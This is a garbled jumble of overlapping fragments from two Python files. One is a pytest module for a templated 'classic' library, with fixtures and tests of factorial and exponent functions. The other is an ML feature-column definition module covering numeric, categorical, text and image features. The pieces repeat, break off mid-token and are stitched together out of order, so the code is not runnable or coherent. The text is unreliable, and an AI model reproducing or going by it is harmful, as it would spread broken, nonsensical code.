setup_function(function): print(\"Setup function:", "max_m) for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx", "teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function:", "delta) >= val_b return (not (val_a + delta) < val_b) and (not (val_b", "[a for a in [1] for b in range(1, num + 1) for", "# for n in [0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert", "for b in range(1, num + 1) for a in [a * b]])[-1]", "function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for", "2, max_m - 1, max_m) for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx]", "for b in [2.0, 11.0, 20.0] for n in [3.0, 6.0, 10.0] for", "bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in [2.0, 11.0, 20.0] for n", "+ [el] + avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds) for el", "max_m) // 2 for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m +", "+ [a for a in [1] for b in range(1, num + 1)", "2 for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m", "(min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):])", "[(f, b, n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for", "((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b)) delta", "future.builtins import (ascii, filter, hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import", "tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a) + tolerance) >=", "enumerate(axis_bounds) for el in axis] return set(bound_vals) def 
setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def", "{0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__))", "unicode_literals) import pytest from future.builtins import (ascii, filter, hex, map, oct, zip, object,", "return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def", "for f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a in [1]", "el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown", "def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def", "in [2.0, 11.0, 20.0] for n in [3.0, 6.0, 10.0] for f in", "a in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base, num", "print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f, n)", "11.0, 20.0] for n in [3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]:", "function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1):", "(val_a - delta) <= val_b and (val_a + delta) >= val_b return (not", "avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds) for el in axis] return", "(Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): 
{0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1,", "18)]) # for n in [0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]:", "+ avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds) for el in axis]", "@pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__))", "request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f, n) for (n,) in bound_values(*[(0,", "in [(f, b, n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) #", "return (not (val_a + delta) < val_b) and (not (val_b + delta) <", "bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2 for (min_m, max_m) in min_max_groups]", "def test_expt(fixture_func1): for fn1, base, num in [(f, b, n) for (b, n)", "n) for (n,) in bound_values(*[(0, 18)]) # for n in [0, 9, 18]", "n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in", "1) for a in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1,", "+ delta) >= val_b return (not (val_a + delta) < val_b) and (not", "-*- coding: utf-8 -*- '''Test cases for Classic module.'''from __future__ import (absolute_import, division,", "import (ascii, filter, hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic", "- delta) <= val_b and (val_a + delta) >= val_b return (not (val_a", "print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function", "def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in", "(n,) in bound_values(*[(0, 18)]) # for n in [0, 9, 18] for f", "base, num in [(f, b, n) 
for (b, n) in bound_values(*[(2.0, 20.0), (3.0,", "(not (val_a + delta) < val_b) and (not (val_b + delta) < val_a)", "for n in [3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base", "+ tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a - delta) <= val_b", "+ max_m) // 2 for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m", "in [0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a", "in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for ndx,", "in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base, num in", "print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1):", "import pytest from future.builtins import (ascii, filter, hex, map, oct, zip, object, range)", "fn1(num) def test_expt(fixture_func1): for fn1, base, num in [(f, b, n) for (b,", "b, n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b", "for fn1, num in [(f, n) for (n,) in bound_values(*[(0, 18)]) # for", "n in [0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1] +", "<= val_b and (val_a + delta) >= val_b return (not (val_a + delta)", "18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a in", "max_m) // 2, max_m - 1, max_m) for (min_m, max_m) in min_max_groups] bound_vals", "Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import pytest from future.builtins import", "#return ((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b))", "< val_b) and (not (val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals =", "num + 1) for a in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1):", "in range(1, num + 1) for a in [a * b]])[-1] == fn1(num)", "min_max_groups] axis_bounds = 
[(min_m, min_m + 1, (min_m + max_m) // 2, max_m", "[tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds) for", "'''Test cases for Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import pytest", "abs(val_b)) delta = abs(tolerance) #return (val_a - delta) <= val_b and (val_a +", "b in range(1, num + 1) for a in [a * b]])[-1] ==", "+ delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2", "abs(tolerance) #return (val_a - delta) <= val_b and (val_a + delta) >= val_b", "in [1] for b in range(1, num + 1) for a in [a", "for a in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base,", "20.0), (3.0, 10.0)]) # for b in [2.0, 11.0, 20.0] for n in", "(min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m + max_m)", "test_fact(fixture_func1): for fn1, num in [(f, n) for (n,) in bound_values(*[(0, 18)]) #", "module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def", "[el] + avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds) for el in", "fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def", "range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance)", "for fn1, base, num in [(f, b, n) for (b, n) in bound_values(*[(2.0,", "delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2 for", "bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for ndx, axis in", "// 2 for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m + 1,", "def 
bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2 for (min_m, max_m) in", "def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown", "in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in [2.0, 11.0, 20.0] for", "print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__))", "(not (val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m)", "// 2, max_m - 1, max_m) for (min_m, max_m) in min_max_groups] bound_vals =", "10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base, num)", "(absolute_import, division, print_function, unicode_literals) import pytest from future.builtins import (ascii, filter, hex, map,", "1):]) for ndx, axis in enumerate(axis_bounds) for el in axis] return set(bound_vals) def", "min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for ndx, axis", "[classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base, num) assert in_epsilon(base ** num,", "[classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a in [1] for b in", "hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b,", "-*- '''Test cases for Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import", "val_b) and (not (val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m", "map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001):", "in axis] return set(bound_vals) def setup_module(module): 
print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module:", "delta) < val_b) and (not (val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals", "b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base, num in [(f, b, n)", "[(f, n) for (n,) in bound_values(*[(0, 18)]) # for n in [0, 9,", "+ max_m) // 2, max_m - 1, max_m) for (min_m, max_m) in min_max_groups]", "delta) <= val_b and (val_a + delta) >= val_b return (not (val_a +", "for el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module):", "cases for Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import pytest from", "for a in [1] for b in range(1, num + 1) for a", "tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a - delta) <= val_b and", "setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup", "num in [(f, b, n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)])", "(Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f, n) for (n,)", "for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in [2.0,", "for (n,) in bound_values(*[(0, 18)]) # for n in [0, 9, 18] for", "max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for", "+ 1) for a in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for", "min_m + 1, (min_m + max_m) // 2, max_m - 1, max_m) for", "filter, hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a,", "def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) 
def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request):", "max_m - 1, max_m) for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] +", "from future.builtins import (ascii, filter, hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}}", "= [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds)", "avg_vals = [(min_m + max_m) // 2 for (min_m, max_m) in min_max_groups] axis_bounds", "function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function", "{0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function):", "for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx +", "classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and #", "[0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for", "b in [2.0, 11.0, 20.0] for n in [3.0, 6.0, 10.0] for f", "6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base,", "in [(f, n) for (n,) in bound_values(*[(0, 18)]) # for n in [0,", "(ascii, filter, hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def", "(val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) //", "(base ** num) == fn1(base, num) assert in_epsilon(base ** num, fn1(base, num), 0.001" ]
[ "clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\",", "import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\":", "utf-8 -*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\":", "-*- coding: utf-8 -*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info =", "coding: utf-8 -*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = {", "\"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\",", "# -*- coding: utf-8 -*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info", "-*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG", "from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\":", "analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\": \"Project1\", \"plugin_config\":", "{ \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\": \"Project1\", \"plugin_config\": {} }", "\"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", 
\"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\": \"Project1\", \"plugin_config\": {} } AnalyzeClarisse(**analyze_info).analyse()", "= { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\": \"Project1\", \"plugin_config\": {}", "<filename>help/examples/only_analyze_demo.py # -*- coding: utf-8 -*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse", "rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\",", "analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\":", "AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\": \"Project1\"," ]
[ "split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None):", "it is not empty, then the words will be replaced with a matrix,", "TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict,", "KIND, either express or implied. # See the License for the specific language", "Unless required by applicable law or agreed to in writing, software # distributed", "data used to train machine learning models. Data to be used in training,", "(BOW or tf*idf) should be normalize (used with L2 norm) strip_html: Boolean on", "\"\"\"Creates a feature representing the target label or value of the instance. Args:", "feature column. Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None,", "split text stop_words: Either list or set, specifying the stop words to be", "from _transforms import FeatureVector def key(name): \"\"\"Creates a feature representing the key of", "of logarithm to be applied. Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name,", "key of the instance. Args: name: Name of feature column. Returns: An instance", "to the vocab. split_regex: Regex rule to extract the column value. Defaults to", "target(name='target'): \"\"\"Creates a feature representing the target label or value of the instance.", "An instance of CategoricalFeatureColumn. 
\"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None,", "should be normalize (used with L2 norm) strip_html: Boolean on whether html_markup should", "models. Data to be used in training, prediction and evaluation is described in", "to be requested from nltk. Use [] for no stopwords. For more info", "split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form", "this file except in compliance with the License. # You may obtain a", "default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False,", "r\"\"\"Creates a categorical or discrete value column within a feature. Args: name: Name", "column. Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a", "\"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical", "with a matrix, one row for each word frequency_threshold: Frequency threshold below which", "feature representing the key of the instance. Args: name: Name of feature column.", "Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None,", "return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1,", "feature. Args: name: Name of feature column. 
default: Default value for the column.", "ANY KIND, either express or implied. # See the License for the specific", "return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or", "register_transformer from _transforms import ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates a", "def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within a feature. Args: name:", "to group on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default,", "constructing the vocabulary/ngrams. split_regex: Regex rule to split text stop_words: Either list or", "the tokenizer should generate (2 for bigrams etc) use_tf_idf: Boolean on whether the", "nltk. Use [] for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on", "empty, then the words will be replaced with a matrix, one row for", "use_tf_idf: Boolean on whether the BOW representation should be tf*idf normalize: Boolean on", "a feature representing the target label or value of the instance. Args: name:", "the specific language governing permissions and # limitations under the License. \"\"\"Classes for", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "described in terms of features. This module provides functionality to define those features,", "Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates", "FeatureMetadata from _features import ImageFeatureColumn from _features import KeyFeatureColumn from _features import NumericFeatureColumn", "FeatureVector def key(name): \"\"\"Creates a feature representing the key of the instance. 
Args:", "ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image", "of feature column. Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'):", "the instance. Args: name: Name of feature column. Returns: An instance of TargetFeatureColumn.", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "text should be stemmed ngrams: number of ngrams the tokenizer should generate (2", "of html tags whose text should be ignored word2vec_dict: Dictionary of word ->", "len 3. - Use r'\\S+' to group on non-whitespace. Returns: An instance of", "whether the BOW representation should be tf*idf normalize: Boolean on whether sparse vector", "should be tf*idf normalize: Boolean on whether sparse vector (BOW or tf*idf) should", "or tf*idf) should be normalize (used with L2 norm) strip_html: Boolean on whether", "OF ANY KIND, either express or implied. # See the License for the", "words to be ignored or a string representing the language of stopwords to", "should be removed before processing removable_tags: list of html tags whose text should", "key(name): \"\"\"Creates a feature representing the key of the instance. Args: name: Name", "Args: name: name of image feature default: Default value for the column. Returns:", "Name of feature column. default: Default value for the column. frequency_threshold: Frequency threshold", "the stop words to be ignored or a string representing the language of", "sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a", "column. Returns: An instance of TargetFeatureColumn. 
\"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0):", "on whether sparse vector (BOW or tf*idf) should be normalize (used with L2", "import KeyFeatureColumn from _features import NumericFeatureColumn from _features import TargetFeatureColumn from _features import", "feature column. default: Default value for the column. sampling_percentage: Percentage value (0-100) for", "a free-form text value column within a feature. Args: name: Name of feature", "within a feature. Args: name: Name of feature column. default: Default value for", "then the words will be replaced with a matrix, one row for each", "BOW representation should be tf*idf normalize: Boolean on whether sparse vector (BOW or", "value. Defaults to None, which means no splitting. Examples: - Use r'\\w{1,}' to", "those features. \"\"\" from _features import CategoricalFeatureColumn from _features import Feature from _features", "default: Default value for the column. Returns: An instance of ImageFeatureColumn. \"\"\" return", "governing permissions and # limitations under the License. \"\"\"Classes for defining the data", "set, specifying the stop words to be ignored or a string representing the", "and data transformations to apply to produce those features. \"\"\" from _features import", "Args: name: Name of feature column. default: Default value for the column. log_base:", "tags whose text should be ignored word2vec_dict: Dictionary of word -> word_vectors. If", "License. \"\"\"Classes for defining the data used to train machine learning models. Data", "[] for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text", "Boolean on whether sparse vector (BOW or tf*idf) should be normalize (used with", "be ignored word2vec_dict: Dictionary of word -> word_vectors. If it is not empty,", "in training, prediction and evaluation is described in terms of features. This module", "All Rights Reserved. 
# # Licensed under the Apache License, Version 2.0 (the", "\"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False,", "Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache", "use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column within", "_features import FeatureMetadata from _features import ImageFeatureColumn from _features import KeyFeatureColumn from _features", "nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be stemmed ngrams: number of ngrams", "should be ignored word2vec_dict: Dictionary of word -> word_vectors. If it is not", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be stemmed ngrams:", "define those features, and data transformations to apply to produce those features. \"\"\"", "row for each word frequency_threshold: Frequency threshold below which words/ngrams are not added", "norm) strip_html: Boolean on whether html_markup should be removed before processing removable_tags: list", "the License. \"\"\"Classes for defining the data used to train machine learning models.", "from _features import KeyFeatureColumn from _features import NumericFeatureColumn from _features import TargetFeatureColumn from", "- Use r'\\w{3,}' to group alphanumerical characters of len 3. 
- Use r'\\S+'", "\"\"\" from _features import CategoricalFeatureColumn from _features import Feature from _features import FeatureColumn", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "vocab. split_regex: Regex rule to extract the column value. Defaults to None, which", "Dictionary of word -> word_vectors. If it is not empty, then the words", "matrix, one row for each word frequency_threshold: Frequency threshold below which words/ngrams are", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "evaluation is described in terms of features. This module provides functionality to define", "that should be sampled for constructing the vocabulary/ngrams. split_regex: Regex rule to split", "be tf*idf normalize: Boolean on whether sparse vector (BOW or tf*idf) should be", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "not empty, then the words will be replaced with a matrix, one row", "Use r'\\w{1,}' to group alphanumerical characters of len 1. - Use r'\\w{3,}' to", "required by applicable law or agreed to in writing, software # distributed under", "An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a", "characters of len 3. - Use r'\\S+' to group on non-whitespace. 
Returns: An", "ignored or a string representing the language of stopwords to be requested from", "(2 for bigrams etc) use_tf_idf: Boolean on whether the BOW representation should be", "TextFeatureColumn from _predict import FeatureProducer from _registries import register_analyzer from _registries import register_transformer", "applicable law or agreed to in writing, software # distributed under the License", "import FeatureColumn from _features import FeatureFormat from _features import FeatureMetadata from _features import", "or a string representing the language of stopwords to be requested from nltk.", "normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column within a", "be stemmed ngrams: number of ngrams the tokenizer should generate (2 for bigrams", "feature default: Default value for the column. Returns: An instance of ImageFeatureColumn. \"\"\"", "name of image feature default: Default value for the column. Returns: An instance", "or agreed to in writing, software # distributed under the License is distributed", "normalize (used with L2 norm) strip_html: Boolean on whether html_markup should be removed", "of feature column. default: Default value for the column. sampling_percentage: Percentage value (0-100)", "column. default: Default value for the column. frequency_threshold: Frequency threshold below which words", "CONDITIONS OF ANY KIND, either express or implied. # See the License for", "to apply to produce those features. \"\"\" from _features import CategoricalFeatureColumn from _features", "strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column within a feature.", "defining the data used to train machine learning models. Data to be used", "Name of feature column. Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def", "Default value for the column. 
